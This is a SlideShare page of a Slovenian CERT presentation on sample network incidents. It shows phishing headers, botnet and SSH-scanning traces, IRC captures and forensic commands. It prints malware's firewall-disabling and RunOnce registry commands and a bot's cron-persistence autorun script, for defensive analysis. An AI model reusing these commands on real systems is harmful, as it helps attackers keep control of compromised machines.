2012 Vzorčni primeri omrežnih incidentov

182 views

Published on

Nekaj primerov obravanavanih varnostnih incidentov na internetu

Published in: Internet, Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
182
On SlideShare
0
From Embeds
0
Number of Embeds
4
Actions
Shares
0
Downloads
2
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

2012 Vzorčni primeri omrežnih incidentov

  1. 1. vzorčni primeri omrežnih incidentov tadej@cert.si
  2. 2. Copyright Carnegie Mellon University
  3. 3. Daj človeku ukradeno kreditno kartico in bo en dan jedel kot kralj. Nauči ga kako se ribari, pa bo preskrbljen za življenje. -- starodaven nigerijski pregovor
  4. 4. Received: from [98.139.xxx.xxx] by web141006.mail.bf1.yahoo.com via HTTP; Wed, 11 Apr 2012 12:15:40 PDT X-Mailer: YahooMailWebService/0.8.117.340979 References: <1333964698.56162.YahooMailNeo@web141005.mail.bf1.yahoo.com> <1333964778.34343.YahooMailNeo@web141001.mail.bf1.yahoo.com> <1333964865.49465.YahooMailNeo@web141004.mail.bf1.yahoo.com> <1333964990.45879.YahooMailNeo@web141003.mail.bf1.yahoo.com> <1333965126.47512.YahooMailNeo@web141003.mail.bf1.yahoo.com> <1333965576.34205.YahooMailNeo@web141001.mail.bf1.yahoo.com> <1333965781.74493.YahooMailNeo@web141005.mail.bf1.yahoo.com> <1333965883.95604.YahooMailNeo@web141006.mail.bf1.yahoo.com> <1333966100.81116.YahooMailNeo@web141004.mail.bf1.yahoo.com> <1333966284.12608.YahooMailNeo@web141002.mail.bf1.yahoo.com> <1333966541.81116.YahooMailNeo@web141004.mail.bf1.yahoo.com> <1333966617.34414.YahooMailNeo@web141001.mail.bf1.yahoo.com> <1333966670.88285.YahooMailNeo@web141004.mail.bf1.yahoo.com> <1333966816.85842.YahooMailNeo@web141006.mail.bf1.yahoo.com> <1333968605.76830.YahooMailNeo@web141003.mail.bf1.yahoo.com> <1333968944.99197.YahooMailNeo@web141002.mail.bf1.yahoo.com> <1333969055.16421.YahooMailNeo@web141005.mail.bf1.yahoo.com> <1333969203.18144.YahooMailNeo@web141005.mail.bf1.yahoo.com> <1333969409.27611.YahooMailNeo@web141006.mail.bf1.yahoo.com> <1333969499.38548.YahooMailNeo@web141006.mail.bf1.yahoo.com> <1333969533.98850.YahooMailNeo@web141004.mail.bf1.yahoo.com> <1333969617.82064.YahooMailNeo@web141001.mail.bf1.yahoo.com> <1333969837.16102.YahooMailNeo@web141005.mail.bf1.yahoo.com> <1333970999.36974.YahooMailNeo@web141006.mail.bf1.yahoo.com> <1333971076.45397.YahooMailNeo@web141002.mail.bf1.yahoo.com> <1333971331.18898.YahooMailNeo@web141003.mail.bf1.yahoo.com> <1333976214.9952.YahooMailNeo@web141006.mail.bf1.yahoo.com> <1333978671.78505.YahooMailNeo@web141003.mail.bf1.yahoo.com> Message-ID: <1334171740.94092.YahooMailNeo@web141006.mail.bf1.yahoo.com> Date: Wed, 11 Apr 2012 12:15:40 -0700 (PDT) From: Xxxx Xxxxx <xxxx.xxxxx@yahoo.com> Reply-To: Xxxx Xxxxx <xxxx.xxxxx@yahoo.com> Subject: =?utf-8?B?Rnc6IGZpbmFuxI1uYSBrYXJ0aWNhICggcmHEjXVub3ZvZHNrYSBzbHXFvmJh?= =?utf-8?B?KQ==?= To: "xxxxxx.xxxxx@xxxxx.si" Cc: xxxxx.xxxx@siol.net In-Reply-To: <1333978671.78505.YahooMailNeo@web141003.mail.bf1.yahoo.com>
  5. 5. Operation: Process Create Result: SUCCESS Command line: "C:Program FilesSumatraPDFSumatraPDF.exe" "C:Documents and SettingsttApplication Datanavodila_pogodba_ePOBOT_AJPES.pdf"
  6. 6. cmd /c REG ADD HKLMSystemCurrentControlSetServicesSharedAccessParametersFirewallPolicyStand ardProfile /v "DoNotAllowExceptions" /t REG_DWORD /d "0" /f cmd /c REG ADD HKLMSystemCurrentControlSetServicesSharedAccessParametersFirewallPolicyStand ardProfileAuthorizedApplicationsList /v "C:Documents and SettingsuserApplication Datasvchost.exe" /t REG_SZ /d "C:Documents and SettingsuserApplication Datasvchost.exe:*:Enabled:Windows Messanger" /f cmd /c REG ADD HKLMSystemCurrentControlSetServicesSharedAccessParametersFirewallPolicyStand ardProfileAuthorizedApplicationsList /v "C:Documents and SettingsuserApplication DataSvchost32.exe" /t REG_SZ /d "C:Documents and SettingsuserApplication DataSvchost32.exe:*:Enabled:Windows Messanger" /f "HKCUSoftwareMicrosoftWindowsCurrentVersionRunOnce" + "IeXplorer32" "C:UsersUserAppDataRoamingPrometna_Kartica_Apr2012.exe"
  7. 7. $ whois 178.172.xxx.xxx inetnum: 178.172.xxx.0 - 178.172.xxx.255 netname: ARNES-NET descr: Academic and Research Network of Slovenia descr: Ljubljana descr: Slovenia
  8. 8. # netstat -anpt | more ... 178.172.xxx.xxx:44947 178.17.86.40:22 SYN_SENT - 178.172.xxx.xxx:40448 178.17.86.42:22 SYN_SENT - 178.172.xxx.xxx:47351 178.17.86.35:22 SYN_SENT - 178.172.xxx.xxx:57112 178.17.85.142:22 SYN_SENT - 178.172.xxx.xxx:44947 178.17.86.48:22 SYN_SENT - 178.172.xxx.xxx:40448 178.17.86.242:22 SYN_SENT - 178.172.xxx.xxx:47351 178.17.86.135:22 SYN_SENT - 178.172.xxx.xxx:57112 178.17.85.12:22 SYN_SENT - 178.172.xxx.xxx:44947 178.17.86.50:22 SYN_SENT - 178.172.xxx.xxx:40448 178.17.86.92:22 SYN_SENT - 178.172.xxx.xxx:47351 178.17.86.25:22 SYN_SENT - 178.172.xxx.xxx:57112 178.17.85.122:22 SYN_SENT - ...
  9. 9. # netstat -anpt | more ... 178.172.xxx.xxx:48174 208.83.20.130:6667 ESTABLISHED 5472/-bash 178.172.xxx.xxx:57221 194.109.20.90:6667 ESTABLISHED 5472/-bash 178.172.xxx.xxx:34110 195.197.175.21:7000 ESTABLISHED 5472/-bash ... $ dig –x 208.83.20.130 130.20.83.208.in-addr.arpa. 195 IN PTR Tampa.FL.US.Undernet.org. 90.20.109.194.in-addr.arpa. 86400 IN PTR undernet.xs4all.nl. 21.175.197.195.in-addr.arpa. 14400 IN PTR irc2.saunalahti.fi.
  10. 10. # lsof -np 5472 ... -bash 5472 root txt REG 8,1 35352 /var/spool/samba/.bash/-bash ...
  11. 11. # file /var/spool/samba/.bash/* ./autorun: POSIX shell script text executable ./-bash: ELF 32-bit LSB executable, Intel 80386, version ./cron.d: ASCII text ./cyc.acc: ASCII text ./cyc.hold: a /usr/bin/perl script text executable ./cyc.pid: ASCII text ./cyc.session: ASCII text ./cyc.set: ASCII English text ./go: ASCII text ./mech.dir: ASCII text ./m.help: data ./pico: ELF 32-bit LSB executable, Intel 80386, version 1 ./run: POSIX shell script text executable ./stealth: ELF 32-bit LSB executable, Intel 80386, version 1 ./update: POSIX shell script text executable
  12. 12. $ cat /var/spool/samba/.bash/autorun #!/bin/sh pwd > mech.dir dir=$(cat mech.dir) echo "* * * * * $dir/update >/dev/null 2>&1" > cron.d crontab cron.d && perl cyc.hold crontab -l | grep update echo "#!/bin/sh if test -r $dir/cyc.pid; then pid=$(cat $dir/cyc.pid) if $(kill -CHLD $pid >/dev/null 2>&1); then exit 0 fi fi cd $dir rm -rf cyc.hold ./run &>/dev/null" > update chmod u+x update
  13. 13. $ grep Accepted secure May 4 11:29:09 spxxxxx sshd[22429]: Accepted password for bxxx from 193.2.xxx.xxx port 60429 ssh2 May 4 11:29:52 spxxxxx sshd[22453]: Accepted password for bxxx from 193.2.xxx.xxx port 60438 ssh2 May 4 11:56:45 spxxxxx sshd[22697]: Accepted password for root from 209.172.51.39 port 48792 ssh2 May 4 16:05:46 spxxxxx sshd[23079]: Accepted password for root from 79.118.61.94 port 1079 ssh2 May 4 18:05:39 spxxxxx sshd[17116]: Accepted password for root from 14.63.213.191 port 48309 ssh2 May 5 10:42:35 spxxxxx sshd[22874]: Accepted password for root from 202.199.160.210 port 40019 ssh2 May 5 11:52:38 spxxxxx sshd[23117]: Accepted password for root from 86.124.223.6 port 2058 ssh2 May 5 11:56:29 spxxxxx sshd[23184]: Accepted password for root from 86.124.223.6 port 2061 ssh2 May 5 11:57:18 spxxxxx sshd[23197]: Accepted password for root from 86.124.223.6 port 2062 ssh2 May 5 11:57:28 spxxxxx sshd[23204]: Accepted password for root from 86.124.223.6 port 2063 ssh2
  14. 14. Now talking on #xhack * Topic for #xhack is: ./a 178.17;./a 201.251;./a 195.76;./a 195.248;./a 81.211 129.25 128.32 144.30 134.50 * Topic for #xhack set by BaRoZ at Sun May 01 16:21:28 2011 ... <BaRoZ> nuf1f_ say a <BaRoZ> nuf1f_ say a <BaRoZ> +kb nuf1f_ * start__ sets ban on *!*userr@194.249.*.* > > * You have been kicked from #xhack by start__ (Requested Kick)
  15. 15. * /who #xhack * #xhack ~Fly 178.172.xxx.xxx *.undernet.org sasesase H :3 Powerd by move * #xhack ~Fly 124.82.70.197 *.undernet.org informati H@ :3 Powerd by move * #xhack ~Fly 121.241.77.194 *.undernet.org luccc H@ :3 Powerd by move * #xhack ~Fly biophys3.physics.usyd.edu.au *.undernet.org biophys3 H@ :3 Powerd by move * #xhack ~chattr 218.189.204.215 *.undernet.org DHL H@ :3 chattr * #xhack ~Fly 93-44-208-192.ip98.fastwebnet.it *.undernet.org valy____ H@ :3 Powerd by move * #xhack ~lolipop 182-166-5-237f1.shg1.eonet.ne.jp *.undernet.org part_ H@ :3 lolipop * #xhack ~lolipop Edd.users.undernet.org *.undernet.org valyca H@x :3 lolipop * #xhack ~luzar MService.users.undernet.org *.undernet.org VaLi H@x :3 luser * #xhack ~alpha 62.94.13.227 *.undernet.org vali__ H@ :3 omega * #xhack ~circ 82.193.22.182 *.undernet.org start__ H@ :3 circ * #xhack ~chattr 82.193.22.182 *.undernet.org start___ H@ :3 chattr * #xhack ~circ 122.99.166.142 *.undernet.org removed__ H@ :3 circ * #xhack ~Fly 80.82.17.151 *.undernet.org xHaCk H@ :3 Powerd by move * #xhack ~lolipop a83-161-134-137.adsl.xs4all.nl *.undernet.org valyca__ H@ :3 lolipop * #xhack ~circ a83-161-134-137.adsl.xs4all.nl *.undernet.org removed H@ :3 circ * #xhack ~chattr a83-161-134-137.adsl.xs4all.nl *.undernet.org moved H@ :3 chattr * #xhack ~circ 62.94.13.227 *.undernet.org VaLi_ H@ :3 circ * #xhack ~lolipop 82.193.22.182 *.undernet.org start_ H@ :3 lolipop * #xhack ~lolipop 190.114.224.11 *.undernet.org valyca_ H@ :3 lolipop * #xhack ~chattr 122.99.166.142 *.undernet.org VaLy___ H@ :3 chattr * #xhack ~circ 190.114.224.11 *.undernet.org removed_ H@ :3 circ * #xhack ~VaLy hax0r.users.undernet.org *.undernet.org BaRoZ H@x :3 VaLy * #xhack ~Aly 50.16.26.202 *.undernet.org gzip H@ :3 Powerd by move * #xhack ~chattr 190.114.224.11 *.undernet.org moved_ H@ :3 chattr * #xhack ~UK mail.pjsind.co.uk *.undernet.org part____ H@ :3 Powerd by move * #xhack ~circ Ezl.users.undernet.org *.undernet.org valentin H@x :3 circ * #xhack ~bursuc sd-23267.dedibox.fr *.undernet.org VaLy_ H@ :3 Powerd by move * #xhack ~lolipop 122.99.166.142 *.undernet.org valyca___ H@ :3 lolipop * #xhack ~Fly 88.191.129.21 *.undernet.org Valeriu H@ :3 Powerd by move * #xhack ~Fly 46.28.110.179 *.undernet.org pizdel H@ :3 Powerd by move * #xhack ~Kitty xray426.server4you.de *.undernet.org move H@ :3 Powerd by move * #xhack ~Fly v-182-163-56-103.ub-freebit.net *.undernet.org valy_____ H@ :3 Powerd by move * #xhack ~chattr 182-166-5-237f1.shg1.eonet.ne.jp *.undernet.org cUc H@ :3 chattr * #xhack :End of /WHO list.
  16. 16. # find / -ctime -10 –print # ps –ef # find / -mtime -5 –ls # lsof –np PID # find / -amin -120 –print # lsof –ni TCP:22 # stat somefile # pstree -aAp # cat .bash_history # last -i # ls –la # file somefile.bin # ls –lct # strings somefile.bin # ls –l /proc/PID/ # chkrootkit # rkhunter

×